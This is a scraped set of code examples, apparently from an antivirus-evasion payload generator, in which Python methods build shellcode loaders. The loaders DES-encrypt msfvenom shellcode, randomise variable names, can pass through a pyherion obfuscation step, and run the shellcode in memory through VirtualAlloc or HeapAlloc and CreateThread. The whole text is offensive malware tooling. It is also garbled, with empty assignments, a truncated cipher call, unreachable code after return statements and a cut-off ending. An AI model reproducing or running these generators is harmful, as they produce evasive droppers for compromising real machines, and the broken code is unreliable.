def generate(self):
        if self.required_options["INJECT_METHOD"][0].lower() == "virtual":
            if self.required_options["EXPIRE_PAYLOAD"][0].lower() == "x":

                # Generate Shellcode Using msfvenom
                Shellcode = self.shellcode.generate(self.required_options)

                # Generate Random Variable Names
                RandPtr = helpers.randomString()
                RandBuf = helpers.randomString()
                RandHt = helpers.randomString()
                ShellcodeVariableName = helpers.randomString()
                RandIV = helpers.randomString()
                RandDESKey = helpers.randomString()
                RandDESPayload = helpers.randomString()
                RandEncShellCodePayload = helpers.randomString()
                randctypes = helpers.randomString()

                # encrypt the shellcode and get our randomized key/iv
                (EncShellCode, (DESKey, iv) ) = encryption.encryptDES(Shellcode)

                # Create Payload File
                PayloadCode = 'from Crypto.Cipher import DES\n'
                PayloadCode += 'import ctypes as ' + randctypes + '\n'
                PayloadCode += RandIV + ' = \'' + iv + '\'\n'
                PayloadCode += RandDESKey + ' = \'' + DESKey + '\'\n'
                PayloadCode += RandDESPayload + ' =' + RandDESKey + ', DES.MODE_CFB, ' + RandIV + ')\n'
                PayloadCode += RandEncShellCodePayload + ' = \'' + EncShellCode.encode("string_escape") + '\'\n'
                PayloadCode += ShellcodeVariableName + ' = bytearray(' + RandDESPayload + '.decrypt(' + RandEncShellCodePayload + ').decode(\'string_escape\'))\n'
                PayloadCode += RandPtr + ' = ' + randctypes + '.windll.kernel32.VirtualAlloc(' + randctypes + '.c_int(0),' + randctypes + '.c_int(len('+ ShellcodeVariableName +')),' + randctypes + '.c_int(0x3000),' + randctypes + '.c_int(0x40))\n'
                PayloadCode += RandBuf + ' = (' + randctypes + '.c_char * len(' + ShellcodeVariableName + ')).from_buffer(' + ShellcodeVariableName + ')\n'
                PayloadCode += randctypes + '.windll.kernel32.RtlMoveMemory(' + randctypes + '.c_int(' + RandPtr + '),' + RandBuf + ',' + randctypes + '.c_int(len(' + ShellcodeVariableName + ')))\n'
                PayloadCode += RandHt + ' = ' + randctypes + '.windll.kernel32.CreateThread(' + randctypes + '.c_int(0),' + randctypes + '.c_int(0),' + randctypes + '.c_int(' + RandPtr + '),' + randctypes + '.c_int(0),' + randctypes + '.c_int(0),' + randctypes + '.pointer(' + randctypes + '.c_int(0)))\n'
                PayloadCode += randctypes + '.windll.kernel32.WaitForSingleObject(' + randctypes + '.c_int(' + RandHt + '),' + randctypes + '.c_int(-1))'

                if self.required_options["USE_PYHERION"][0].lower() == "y":
                    PayloadCode = encryption.pyherion(PayloadCode)

                return PayloadCode


                # Get our current date and add number of days to the date
                todaysdate =
                expiredate = str(todaysdate + timedelta(days=int(self.required_options["EXPIRE_PAYLOAD"][0])))

                # Generate Shellcode Using msfvenom
                Shellcode = self.shellcode.generate(self.required_options)

                # Generate Random Variable Names
                RandPtr = helpers.randomString()
                RandBuf = helpers.randomString()
                RandHt = helpers.randomString()
                ShellcodeVariableName = helpers.randomString()
                RandIV = helpers.randomString()
                RandDESKey = helpers.randomString()
                RandDESPayload = helpers.randomString()
                RandEncShellCodePayload = helpers.randomString()
                RandToday = helpers.randomString()
                RandExpire = helpers.randomString()
                randctypes = helpers.randomString()

                # encrypt the shellcode and get our randomized key/iv
                (EncShellCode, (DESKey, iv) ) = encryption.encryptDES(Shellcode)

                # Create Payload File
                PayloadCode = 'from Crypto.Cipher import DES\n'
                PayloadCode += 'import ctypes as ' + randctypes + '\n'
                PayloadCode += 'from datetime import datetime\n'
                PayloadCode += 'from datetime import date\n\n'
                PayloadCode += RandToday + ' =\n'
                PayloadCode += RandExpire + ' = datetime.strptime(\"' + expiredate[2:] + '\",\"%y-%m-%d\") \n'
                PayloadCode += 'if ' + RandToday + ' < ' + RandExpire + ':\n'
                PayloadCode += '\t' + RandIV + ' = \'' + iv + '\'\n'
                PayloadCode += '\t' + RandDESKey + ' = \'' + DESKey + '\'\n'
                PayloadCode += '\t' + RandDESPayload + ' =' + RandDESKey + ', DES.MODE_CFB, ' + RandIV + ')\n'
                PayloadCode += '\t' + RandEncShellCodePayload + ' = \'' + EncShellCode.encode("string_escape") + '\'\n'
                PayloadCode += '\t' + ShellcodeVariableName + ' = bytearray(' + RandDESPayload + '.decrypt(' + RandEncShellCodePayload + ').decode(\'string_escape\'))\n'
                PayloadCode += '\t' + RandPtr + ' = ' + randctypes + '.windll.kernel32.VirtualAlloc(' + randctypes + '.c_int(0),' + randctypes + '.c_int(len('+ ShellcodeVariableName +')),' + randctypes + '.c_int(0x3000),' + randctypes + '.c_int(0x40))\n'
                PayloadCode += '\t' + RandBuf + ' = (' + randctypes + '.c_char * len(' + ShellcodeVariableName + ')).from_buffer(' + ShellcodeVariableName + ')\n'
                PayloadCode += '\t' + randctypes + '.windll.kernel32.RtlMoveMemory(' + randctypes + '.c_int(' + RandPtr + '),' + RandBuf + ',' + randctypes + '.c_int(len(' + ShellcodeVariableName + ')))\n'
                PayloadCode += '\t' + RandHt + ' = ' + randctypes + '.windll.kernel32.CreateThread(' + randctypes + '.c_int(0),' + randctypes + '.c_int(0),' + randctypes + '.c_int(' + RandPtr + '),' + randctypes + '.c_int(0),' + randctypes + '.c_int(0),' + randctypes + '.pointer(' + randctypes + '.c_int(0)))\n'
                PayloadCode += '\t' + randctypes + '.windll.kernel32.WaitForSingleObject(' + randctypes + '.c_int(' + RandHt + '),' + randctypes + '.c_int(-1))'

                if self.required_options["USE_PYHERION"][0].lower() == "y":
                    PayloadCode = encryption.pyherion(PayloadCode)

                return PayloadCode

        if self.required_options["INJECT_METHOD"][0].lower() == "heap":
            if self.required_options["EXPIRE_PAYLOAD"][0].lower() == "x":

                # Generate Shellcode Using msfvenom
                Shellcode = self.shellcode.generate(self.required_options)

                # Generate Random Variable Names
                RandPtr = helpers.randomString()
                RandBuf = helpers.randomString()
                RandHt = helpers.randomString()
                ShellcodeVariableName = helpers.randomString()
                RandIV = helpers.randomString()
                RandDESKey = helpers.randomString()
                RandDESPayload = helpers.randomString()
                RandEncShellCodePayload = helpers.randomString()
                HeapVar = helpers.randomString()
                randctypes = helpers.randomString()

                # encrypt the shellcode and get our randomized key/iv
                (EncShellCode, (DESKey, iv) ) = encryption.encryptDES(Shellcode)

                # Create Payload File
                PayloadCode = 'from Crypto.Cipher import DES\n'
                PayloadCode += 'import ctypes as ' + randctypes + '\n'
                PayloadCode += RandIV + ' = \'' + iv + '\'\n'
                PayloadCode += RandDESKey + ' = \'' + DESKey + '\'\n'
                PayloadCode += RandDESPayload + ' =' + RandDESKey + ', DES.MODE_CFB, ' + RandIV + ')\n'
                PayloadCode += RandEncShellCodePayload + ' = \'' + EncShellCode.encode("string_escape") + '\'\n'
                PayloadCode += ShellcodeVariableName + ' = bytearray(' + RandDESPayload + '.decrypt(' + RandEncShellCodePayload + ').decode(\'string_escape\'))\n'
                PayloadCode += HeapVar + ' = ' + randctypes + '.windll.kernel32.HeapCreate(' + randctypes + '.c_int(0x00040000),' + randctypes + '.c_int(len(' + ShellcodeVariableName + ') * 2),' + randctypes + '.c_int(0))\n'
                PayloadCode += RandPtr + ' = ' + randctypes + '.windll.kernel32.HeapAlloc(' + randctypes + '.c_int(' + HeapVar + '),' + randctypes + '.c_int(0x00000008),' + randctypes + '.c_int(len( ' + ShellcodeVariableName + ')))\n'
                PayloadCode += RandBuf + ' = (' + randctypes + '.c_char * len(' + ShellcodeVariableName + ')).from_buffer(' + ShellcodeVariableName + ')\n'
                PayloadCode += randctypes + '.windll.kernel32.RtlMoveMemory(' + randctypes + '.c_int(' + RandPtr + '),' + RandBuf + ',' + randctypes + '.c_int(len(' + ShellcodeVariableName + ')))\n'
                PayloadCode += RandHt + ' = ' + randctypes + '.windll.kernel32.CreateThread(' + randctypes + '.c_int(0),' + randctypes + '.c_int(0),' + randctypes + '.c_int(' + RandPtr + '),' + randctypes + '.c_int(0),' + randctypes + '.c_int(0),' + randctypes + '.pointer(' + randctypes + '.c_int(0)))\n'
                PayloadCode += ranctypes + '.windll.kernel32.WaitForSingleObject(' + randctypes + '.c_int(' + RandHt + '),' + randctypes + '.c_int(-1))'

                if self.required_options["USE_PYHERION"][0].lower() == "y":
                    PayloadCode = encryption.pyherion(PayloadCode)

                return PayloadCode


                # Get our current date and add number of days to the date
                todaysdate =
                expiredate = str(todaysdate + timedelta(days=int(self.required_options["EXPIRE_PAYLOAD"][0])))

                # Generate Shellcode Using msfvenom
                Shellcode = self.shellcode.generate(self.required_options)

                # Generate Random Variable Names
                RandPtr = helpers.randomString()
                RandBuf = helpers.randomString()
                RandHt = helpers.randomString()
                ShellcodeVariableName = helpers.randomString()
                RandIV = helpers.randomString()
                RandDESKey = helpers.randomString()
                RandDESPayload = helpers.randomString()
                RandEncShellCodePayload = helpers.randomString()
                HeapVar = helpers.randomString()
                RandToday = helpers.randomString()
                RandExpire = helpers.randomString()
                randctypes = helpers.randomString()

                # encrypt the shellcode and get our randomized key/iv
                (EncShellCode, (DESKey, iv) ) = encryption.encryptDES(Shellcode)

                # Create Payload File
                PayloadCode = 'from Crypto.Cipher import DES\n'
                PayloadCode += 'import ctypes as ' + randctypes + '\n'
                PayloadCode += 'from datetime import datetime\n'
                PayloadCode += 'from datetime import date\n\n'
                PayloadCode += RandToday + ' =\n'
                PayloadCode += RandExpire + ' = datetime.strptime(\"' + expiredate[2:] + '\",\"%y-%m-%d\") \n'
                PayloadCode += 'if ' + RandToday + ' < ' + RandExpire + ':\n'
                PayloadCode += '\t' + RandIV + ' = \'' + iv + '\'\n'
                PayloadCode += '\t' + RandDESKey + ' = \'' + DESKey + '\'\n'
                PayloadCode += '\t' + RandDESPayload + ' =' + RandDESKey + ', DES.MODE_CFB, ' + RandIV + ')\n'
                PayloadCode += '\t' + RandEncShellCodePayload + ' = \'' + EncShellCode.encode("string_escape") + '\'\n'
                PayloadCode += '\t' + ShellcodeVariableName + ' = bytearray(' + RandDESPayload + '.decrypt(' + RandEncShellCodePayload + ').decode(\'string_escape\'))\n'
                PayloadCode += '\t' + HeapVar + ' = ' + randctypes + '.windll.kernel32.HeapCreate(' + randctypes + '.c_int(0x00040000),' + randctypes + '.c_int(len(' + ShellcodeVariableName + ') * 2),' + randctypes + '.c_int(0))\n'
                PayloadCode += '\t' + RandPtr + ' = ' + randctypes + '.windll.kernel32.HeapAlloc(' + randctypes + '.c_int(' + HeapVar + '),' + randctypes + '.c_int(0x00000008),' + randctypes + '.c_int(len( ' + ShellcodeVariableName + ')))\n'
                PayloadCode += '\t' + RandBuf + ' = (' + randctypes + '.c_char * len(' + ShellcodeVariableName + ')).from_buffer(' + ShellcodeVariableName + ')\n'
                PayloadCode += '\t' + randctypes + '.windll.kernel32.RtlMoveMemory(' + randctypes + '.c_int(' + RandPtr + '),' + RandBuf + ',' + randctypes + '.c_int(len(' + ShellcodeVariableName + ')))\n'
                PayloadCode += '\t' + RandHt + ' = ' + randctypes + '.windll.kernel32.CreateThread(' + randctypes + '.c_int(0),' + randctypes + '.c_int(0),' + randctypes + '.c_int(' + RandPtr + '),' + randctypes + '.c_int(0),' + randctypes + '.c_int(0),' + randctypes + '.pointer(' + randctypes + '.c_int(0)))\n'
                PayloadCode += '\t' + randctypes + '.windll.kernel32.WaitForSingleObject(' + randctypes + '.c_int(' + RandHt + '),' + randctypes + '.c_int(-1))'

                if self.required_options["USE_PYHERION"][0].lower() == "y":
                    PayloadCode = encryption.pyherion(PayloadCode)

                return PayloadCode

            if self.required_options["EXPIRE_PAYLOAD"][0].lower() == "x":

                # Generate Shellcode Using msfvenom
                Shellcode = self.shellcode.generate(self.required_options)

                # Generate Random Variable Names
                RandPtr = helpers.randomString()
                RandBuf = helpers.randomString()
                RandHt = helpers.randomString()
                ShellcodeVariableName = helpers.randomString()
                RandIV = helpers.randomString()
                RandDESKey = helpers.randomString()
                RandDESPayload = helpers.randomString()
                RandEncShellCodePayload = helpers.randomString()
                RandShellcode = helpers.randomString()
                RandReverseShell = helpers.randomString()
                RandMemoryShell = helpers.randomString()

                # encrypt the shellcode and get our randomized key/iv
                (EncShellCode, (DESKey, iv) ) = encryption.encryptDES(Shellcode)

                # Create Payload File
                PayloadCode = 'from Crypto.Cipher import DES\n'
                PayloadCode += 'from ctypes import *\n'
                PayloadCode += RandIV + ' = \'' + iv + '\'\n'
                PayloadCode += RandDESKey + ' = \'' + DESKey + '\'\n'
                PayloadCode += RandDESPayload + ' =' + RandDESKey + ', DES.MODE_CFB, ' + RandIV + ')\n'
                PayloadCode += RandEncShellCodePayload + ' = \'' + EncShellCode.encode("string_escape") + '\'\n'
                PayloadCode += ShellcodeVariableName + ' = ' + RandDESPayload + '.decrypt(' + RandEncShellCodePayload + ').decode(\'string_escape\')\n'
                PayloadCode += RandMemoryShell + ' = create_string_buffer(' + ShellcodeVariableName + ', len(' + ShellcodeVariableName + '))\n'
                PayloadCode += RandShellcode + ' = cast(' + RandMemoryShell + ', CFUNCTYPE(c_void_p))\n'
                PayloadCode += RandShellcode + '()'

                if self.required_options["USE_PYHERION"][0].lower() == "y":
                    PayloadCode = encryption.pyherion(PayloadCode)

                return PayloadCode


                # Get our current date and add number of days to the date
                todaysdate =
                expiredate = str(todaysdate + timedelta(days=int(self.required_options["EXPIRE_PAYLOAD"][0])))

                # Generate Shellcode Using msfvenom
                Shellcode = self.shellcode.generate(self.required_options)

                # Generate Random Variable Names
                RandPtr = helpers.randomString()
                RandBuf = helpers.randomString()
                RandHt = helpers.randomString()
                ShellcodeVariableName = helpers.randomString()
                RandIV = helpers.randomString()
                RandDESKey = helpers.randomString()
                RandDESPayload = helpers.randomString()
                RandEncShellCodePayload = helpers.randomString()
                RandShellcode = helpers.randomString()
                RandReverseShell = helpers.randomString()
                RandMemoryShell = helpers.randomString()
                RandToday = helpers.randomString()
                RandExpire = helpers.randomString()

                # encrypt the shellcode and get our randomized key/iv
                (EncShellCode, (DESKey, iv) ) = encryption.encryptDES(Shellcode)

                # Create Payload File
                PayloadCode = 'from Crypto.Cipher import DES\n'
                PayloadCode += 'from ctypes import *\n'
                PayloadCode += 'from datetime import datetime\n'
                PayloadCode += 'from datetime import date\n\n'
                PayloadCode += RandToday + ' =\n'
                PayloadCode += RandExpire + ' = datetime.strptime(\"' + expiredate[2:] + '\",\"%y-%m-%d\") \n'
                PayloadCode += 'if ' + RandToday + ' < ' + RandExpire + ':\n'
                PayloadCode += '\t' + RandIV + ' = \'' + iv + '\'\n'
                PayloadCode += '\t' + RandDESKey + ' = \'' + DESKey + '\'\n'
                PayloadCode += '\t' + RandDESPayload + ' =' + RandDESKey + ', DES.MODE_CFB, ' + RandIV + ')\n'
                PayloadCode += '\t' + RandEncShellCodePayload + ' = \'' + EncShellCode.encode("string_escape") + '\'\n'
                PayloadCode += '\t' + ShellcodeVariableName + ' = ' + RandDESPayload + '.decrypt(' + RandEncShellCodePayload + ').decode(\'string_escape\')\n'
                PayloadCode += '\t' + RandMemoryShell + ' = create_string_buffer(' + ShellcodeVariableName + ', len(' + ShellcodeVariableName + '))\n'
                PayloadCode += '\t' + RandShellcode + ' = cast(' + RandMemoryShell + ', CFUNCTYPE(c_void_p))\n'
                PayloadCode += '\t' + RandShellcode + '()'

                if self.required_options["USE_PYHERION"][0].lower() == "y":
                    PayloadCode = encryption.pyherion(PayloadCode)

                return PayloadCode
Exemplo n.º 2
    def generate(self):
        if self.required_options["INJECT_METHOD"][0].lower() == "virtual":
            if self.required_options["EXPIRE_PAYLOAD"][0].lower() == "x":

                # Generate Shellcode Using msfvenom
                Shellcode = self.shellcode.generate(self.required_options)

                # Generate Random Variable Names
                RandPtr = helpers.randomString()
                RandBuf = helpers.randomString()
                RandHt = helpers.randomString()
                ShellcodeVariableName = helpers.randomString()
                RandIV = helpers.randomString()
                RandDESKey = helpers.randomString()
                RandDESPayload = helpers.randomString()
                RandEncShellCodePayload = helpers.randomString()

                # encrypt the shellcode and get our randomized key/iv
                (EncShellCode, (DESKey, iv) ) = encryption.encryptDES(Shellcode)

                # Create Payload File
                PayloadCode = 'from Crypto.Cipher import DES\n'
                PayloadCode += 'import ctypes as avlol\n'
                PayloadCode += RandIV + ' = \'' + iv + '\'\n'
                PayloadCode += RandDESKey + ' = \'' + DESKey + '\'\n'
                PayloadCode += RandDESPayload + ' =' + RandDESKey + ', DES.MODE_CFB, ' + RandIV + ')\n'
                PayloadCode += RandEncShellCodePayload + ' = \'' + EncShellCode.encode("string_escape") + '\'\n'
                PayloadCode += ShellcodeVariableName + ' = bytearray(' + RandDESPayload + '.decrypt(' + RandEncShellCodePayload + ').decode(\'string_escape\'))\n'
                PayloadCode += RandPtr + ' = avlol.windll.kernel32.VirtualAlloc(avlol.c_int(0),avlol.c_int(len('+ ShellcodeVariableName +')),avlol.c_int(0x3000),avlol.c_int(0x40))\n'
                PayloadCode += RandBuf + ' = (avlol.c_char * len(' + ShellcodeVariableName + ')).from_buffer(' + ShellcodeVariableName + ')\n'
                PayloadCode += 'avlol.windll.kernel32.RtlMoveMemory(avlol.c_int(' + RandPtr + '),' + RandBuf + ',avlol.c_int(len(' + ShellcodeVariableName + ')))\n'
                PayloadCode += RandHt + ' = avlol.windll.kernel32.CreateThread(avlol.c_int(0),avlol.c_int(0),avlol.c_int(' + RandPtr + '),avlol.c_int(0),avlol.c_int(0),avlol.pointer(avlol.c_int(0)))\n'
                PayloadCode += 'avlol.windll.kernel32.WaitForSingleObject(avlol.c_int(' + RandHt + '),avlol.c_int(-1))'

                if self.required_options["USE_PYHERION"][0].lower() == "y":
                    PayloadCode = encryption.pyherion(PayloadCode)

                return PayloadCode


                # Get our current date and add number of days to the date
                todaysdate =
                expiredate = str(todaysdate + timedelta(days=int(self.required_options["EXPIRE_PAYLOAD"][0])))

                # Generate Shellcode Using msfvenom
                Shellcode = self.shellcode.generate(self.required_options)

                # Generate Random Variable Names
                RandPtr = helpers.randomString()
                RandBuf = helpers.randomString()
                RandHt = helpers.randomString()
                ShellcodeVariableName = helpers.randomString()
                RandIV = helpers.randomString()
                RandDESKey = helpers.randomString()
                RandDESPayload = helpers.randomString()
                RandEncShellCodePayload = helpers.randomString()
                RandToday = helpers.randomString()
                RandExpire = helpers.randomString()

                # encrypt the shellcode and get our randomized key/iv
                (EncShellCode, (DESKey, iv) ) = encryption.encryptDES(Shellcode)

                # Create Payload File
                PayloadCode = 'from Crypto.Cipher import DES\n'
                PayloadCode += 'import ctypes as avlol\n'
                PayloadCode += 'from datetime import datetime\n'
                PayloadCode += 'from datetime import date\n\n'
                PayloadCode += RandToday + ' =\n'
                PayloadCode += RandExpire + ' = datetime.strptime(\"' + expiredate[2:] + '\",\"%y-%m-%d\") \n'
                PayloadCode += 'if ' + RandToday + ' < ' + RandExpire + ':\n'
                PayloadCode += '\t' + RandIV + ' = \'' + iv + '\'\n'
                PayloadCode += '\t' + RandDESKey + ' = \'' + DESKey + '\'\n'
                PayloadCode += '\t' + RandDESPayload + ' =' + RandDESKey + ', DES.MODE_CFB, ' + RandIV + ')\n'
                PayloadCode += '\t' + RandEncShellCodePayload + ' = \'' + EncShellCode.encode("string_escape") + '\'\n'
                PayloadCode += '\t' + ShellcodeVariableName + ' = bytearray(' + RandDESPayload + '.decrypt(' + RandEncShellCodePayload + ').decode(\'string_escape\'))\n'
                PayloadCode += '\t' + RandPtr + ' = avlol.windll.kernel32.VirtualAlloc(avlol.c_int(0),avlol.c_int(len('+ ShellcodeVariableName +')),avlol.c_int(0x3000),avlol.c_int(0x40))\n'
                PayloadCode += '\t' + RandBuf + ' = (avlol.c_char * len(' + ShellcodeVariableName + ')).from_buffer(' + ShellcodeVariableName + ')\n'
                PayloadCode += '\tavlol.windll.kernel32.RtlMoveMemory(avlol.c_int(' + RandPtr + '),' + RandBuf + ',avlol.c_int(len(' + ShellcodeVariableName + ')))\n'
                PayloadCode += '\t' + RandHt + ' = avlol.windll.kernel32.CreateThread(avlol.c_int(0),avlol.c_int(0),avlol.c_int(' + RandPtr + '),avlol.c_int(0),avlol.c_int(0),avlol.pointer(avlol.c_int(0)))\n'
                PayloadCode += '\tavlol.windll.kernel32.WaitForSingleObject(avlol.c_int(' + RandHt + '),avlol.c_int(-1))'

                if self.required_options["USE_PYHERION"][0].lower() == "y":
                    PayloadCode = encryption.pyherion(PayloadCode)

                return PayloadCode

        if self.required_options["INJECT_METHOD"][0].lower() == "heap":
            if self.required_options["EXPIRE_PAYLOAD"][0].lower() == "x":

                # Generate Shellcode Using msfvenom
                Shellcode = self.shellcode.generate(self.required_options)

                # Generate Random Variable Names
                RandPtr = helpers.randomString()
                RandBuf = helpers.randomString()
                RandHt = helpers.randomString()
                ShellcodeVariableName = helpers.randomString()
                RandIV = helpers.randomString()
                RandDESKey = helpers.randomString()
                RandDESPayload = helpers.randomString()
                RandEncShellCodePayload = helpers.randomString()
                HeapVar = helpers.randomString()

                # encrypt the shellcode and get our randomized key/iv
                (EncShellCode, (DESKey, iv) ) = encryption.encryptDES(Shellcode)

                # Create Payload File
                PayloadCode = 'from Crypto.Cipher import DES\n'
                PayloadCode += 'import ctypes as avlol\n'
                PayloadCode += RandIV + ' = \'' + iv + '\'\n'
                PayloadCode += RandDESKey + ' = \'' + DESKey + '\'\n'
                PayloadCode += RandDESPayload + ' =' + RandDESKey + ', DES.MODE_CFB, ' + RandIV + ')\n'
                PayloadCode += RandEncShellCodePayload + ' = \'' + EncShellCode.encode("string_escape") + '\'\n'
                PayloadCode += ShellcodeVariableName + ' = bytearray(' + RandDESPayload + '.decrypt(' + RandEncShellCodePayload + ').decode(\'string_escape\'))\n'
                PayloadCode += HeapVar + ' = avlol.windll.kernel32.HeapCreate(avlol.c_int(0x00040000),avlol.c_int(len(' + ShellcodeVariableName + ') * 2),avlol.c_int(0))\n'
                PayloadCode += RandPtr + ' = avlol.windll.kernel32.HeapAlloc(avlol.c_int(' + HeapVar + '),avlol.c_int(0x00000008),avlol.c_int(len( ' + ShellcodeVariableName + ')))\n'
                PayloadCode += RandBuf + ' = (avlol.c_char * len(' + ShellcodeVariableName + ')).from_buffer(' + ShellcodeVariableName + ')\n'
                PayloadCode += 'avlol.windll.kernel32.RtlMoveMemory(avlol.c_int(' + RandPtr + '),' + RandBuf + ',avlol.c_int(len(' + ShellcodeVariableName + ')))\n'
                PayloadCode += RandHt + ' = avlol.windll.kernel32.CreateThread(avlol.c_int(0),avlol.c_int(0),avlol.c_int(' + RandPtr + '),avlol.c_int(0),avlol.c_int(0),avlol.pointer(avlol.c_int(0)))\n'
                PayloadCode += 'avlol.windll.kernel32.WaitForSingleObject(avlol.c_int(' + RandHt + '),avlol.c_int(-1))'

                if self.required_options["USE_PYHERION"][0].lower() == "y":
                    PayloadCode = encryption.pyherion(PayloadCode)

                return PayloadCode


                # Get our current date and add number of days to the date
                todaysdate =
                expiredate = str(todaysdate + timedelta(days=int(self.required_options["EXPIRE_PAYLOAD"][0])))

                # Generate Shellcode Using msfvenom
                Shellcode = self.shellcode.generate(self.required_options)

                # Generate Random Variable Names
                RandPtr = helpers.randomString()
                RandBuf = helpers.randomString()
                RandHt = helpers.randomString()
                ShellcodeVariableName = helpers.randomString()
                RandIV = helpers.randomString()
                RandDESKey = helpers.randomString()
                RandDESPayload = helpers.randomString()
                RandEncShellCodePayload = helpers.randomString()
                HeapVar = helpers.randomString()
                RandToday = helpers.randomString()
                RandExpire = helpers.randomString()

                # encrypt the shellcode and get our randomized key/iv
                (EncShellCode, (DESKey, iv) ) = encryption.encryptDES(Shellcode)

                # Create Payload File
                PayloadCode = 'from Crypto.Cipher import DES\n'
                PayloadCode += 'import ctypes as avlol\n'
                PayloadCode += 'from datetime import datetime\n'
                PayloadCode += 'from datetime import date\n\n'
                PayloadCode += RandToday + ' =\n'
                PayloadCode += RandExpire + ' = datetime.strptime(\"' + expiredate[2:] + '\",\"%y-%m-%d\") \n'
                PayloadCode += 'if ' + RandToday + ' < ' + RandExpire + ':\n'
                PayloadCode += '\t' + RandIV + ' = \'' + iv + '\'\n'
                PayloadCode += '\t' + RandDESKey + ' = \'' + DESKey + '\'\n'
                PayloadCode += '\t' + RandDESPayload + ' =' + RandDESKey + ', DES.MODE_CFB, ' + RandIV + ')\n'
                PayloadCode += '\t' + RandEncShellCodePayload + ' = \'' + EncShellCode.encode("string_escape") + '\'\n'
                PayloadCode += '\t' + ShellcodeVariableName + ' = bytearray(' + RandDESPayload + '.decrypt(' + RandEncShellCodePayload + ').decode(\'string_escape\'))\n'
                PayloadCode += '\t' + HeapVar + ' = avlol.windll.kernel32.HeapCreate(avlol.c_int(0x00040000),avlol.c_int(len(' + ShellcodeVariableName + ') * 2),avlol.c_int(0))\n'
                PayloadCode += '\t' + RandPtr + ' = avlol.windll.kernel32.HeapAlloc(avlol.c_int(' + HeapVar + '),avlol.c_int(0x00000008),avlol.c_int(len( ' + ShellcodeVariableName + ')))\n'
                PayloadCode += '\t' + RandBuf + ' = (avlol.c_char * len(' + ShellcodeVariableName + ')).from_buffer(' + ShellcodeVariableName + ')\n'
                PayloadCode += '\tavlol.windll.kernel32.RtlMoveMemory(avlol.c_int(' + RandPtr + '),' + RandBuf + ',avlol.c_int(len(' + ShellcodeVariableName + ')))\n'
                PayloadCode += '\t' + RandHt + ' = avlol.windll.kernel32.CreateThread(avlol.c_int(0),avlol.c_int(0),avlol.c_int(' + RandPtr + '),avlol.c_int(0),avlol.c_int(0),avlol.pointer(avlol.c_int(0)))\n'
                PayloadCode += '\tavlol.windll.kernel32.WaitForSingleObject(avlol.c_int(' + RandHt + '),avlol.c_int(-1))'

                if self.required_options["USE_PYHERION"][0].lower() == "y":
                    PayloadCode = encryption.pyherion(PayloadCode)

                return PayloadCode

            if self.required_options["EXPIRE_PAYLOAD"][0].lower() == "x":

                # Generate Shellcode Using msfvenom
                Shellcode = self.shellcode.generate(self.required_options)

                # Generate Random Variable Names
                RandPtr = helpers.randomString()
                RandBuf = helpers.randomString()
                RandHt = helpers.randomString()
                ShellcodeVariableName = helpers.randomString()
                RandIV = helpers.randomString()
                RandDESKey = helpers.randomString()
                RandDESPayload = helpers.randomString()
                RandEncShellCodePayload = helpers.randomString()
                RandShellcode = helpers.randomString()
                RandReverseShell = helpers.randomString()
                RandMemoryShell = helpers.randomString()

                # encrypt the shellcode and get our randomized key/iv
                (EncShellCode, (DESKey, iv) ) = encryption.encryptDES(Shellcode)

                # Create Payload File
                PayloadCode = 'from Crypto.Cipher import DES\n'
                PayloadCode += 'from ctypes import *\n'
                PayloadCode += RandIV + ' = \'' + iv + '\'\n'
                PayloadCode += RandDESKey + ' = \'' + DESKey + '\'\n'
                PayloadCode += RandDESPayload + ' =' + RandDESKey + ', DES.MODE_CFB, ' + RandIV + ')\n'
                PayloadCode += RandEncShellCodePayload + ' = \'' + EncShellCode.encode("string_escape") + '\'\n'
                PayloadCode += ShellcodeVariableName + ' = ' + RandDESPayload + '.decrypt(' + RandEncShellCodePayload + ').decode(\'string_escape\')\n'
                PayloadCode += RandMemoryShell + ' = create_string_buffer(' + ShellcodeVariableName + ', len(' + ShellcodeVariableName + '))\n'
                PayloadCode += RandShellcode + ' = cast(' + RandMemoryShell + ', CFUNCTYPE(c_void_p))\n'
                PayloadCode += RandShellcode + '()'

                if self.required_options["USE_PYHERION"][0].lower() == "y":
                    PayloadCode = encryption.pyherion(PayloadCode)

                return PayloadCode


                # Get our current date and add number of days to the date
                todaysdate =
                expiredate = str(todaysdate + timedelta(days=int(self.required_options["EXPIRE_PAYLOAD"][0])))

                # Generate Shellcode Using msfvenom
                Shellcode = self.shellcode.generate(self.required_options)

                # Generate Random Variable Names
                RandPtr = helpers.randomString()
                RandBuf = helpers.randomString()
                RandHt = helpers.randomString()
                ShellcodeVariableName = helpers.randomString()
                RandIV = helpers.randomString()
                RandDESKey = helpers.randomString()
                RandDESPayload = helpers.randomString()
                RandEncShellCodePayload = helpers.randomString()
                RandShellcode = helpers.randomString()
                RandReverseShell = helpers.randomString()
                RandMemoryShell = helpers.randomString()
                RandToday = helpers.randomString()
                RandExpire = helpers.randomString()

                # encrypt the shellcode and get our randomized key/iv
                (EncShellCode, (DESKey, iv) ) = encryption.encryptDES(Shellcode)

                # Create Payload File
                PayloadCode = 'from Crypto.Cipher import DES\n'
                PayloadCode += 'from ctypes import *\n'
                PayloadCode += 'from datetime import datetime\n'
                PayloadCode += 'from datetime import date\n\n'
                PayloadCode += RandToday + ' =\n'
                PayloadCode += RandExpire + ' = datetime.strptime(\"' + expiredate[2:] + '\",\"%y-%m-%d\") \n'
                PayloadCode += 'if ' + RandToday + ' < ' + RandExpire + ':\n'
                PayloadCode += '\t' + RandIV + ' = \'' + iv + '\'\n'
                PayloadCode += '\t' + RandDESKey + ' = \'' + DESKey + '\'\n'
                PayloadCode += '\t' + RandDESPayload + ' =' + RandDESKey + ', DES.MODE_CFB, ' + RandIV + ')\n'
                PayloadCode += '\t' + RandEncShellCodePayload + ' = \'' + EncShellCode.encode("string_escape") + '\'\n'
                PayloadCode += '\t' + ShellcodeVariableName + ' = ' + RandDESPayload + '.decrypt(' + RandEncShellCodePayload + ').decode(\'string_escape\')\n'
                PayloadCode += '\t' + RandMemoryShell + ' = create_string_buffer(' + ShellcodeVariableName + ', len(' + ShellcodeVariableName + '))\n'
                PayloadCode += '\t' + RandShellcode + ' = cast(' + RandMemoryShell + ', CFUNCTYPE(c_void_p))\n'
                PayloadCode += '\t' + RandShellcode + '()'

                if self.required_options["USE_PYHERION"][0].lower() == "y":
                    PayloadCode = encryption.pyherion(PayloadCode)

                return PayloadCode
Exemplo n.º 3
    def generate(self):
        if self.required_options["inject_method"][0].lower() == "virtual":
            if self.required_options["expire_payload"][0].lower() == "x":

                # Generate Shellcode Using msfvenom
                Shellcode = self.shellcode.generate()

                # Generate Random Variable Names
                RandPtr = helpers.randomString()
                RandBuf = helpers.randomString()
                RandHt = helpers.randomString()
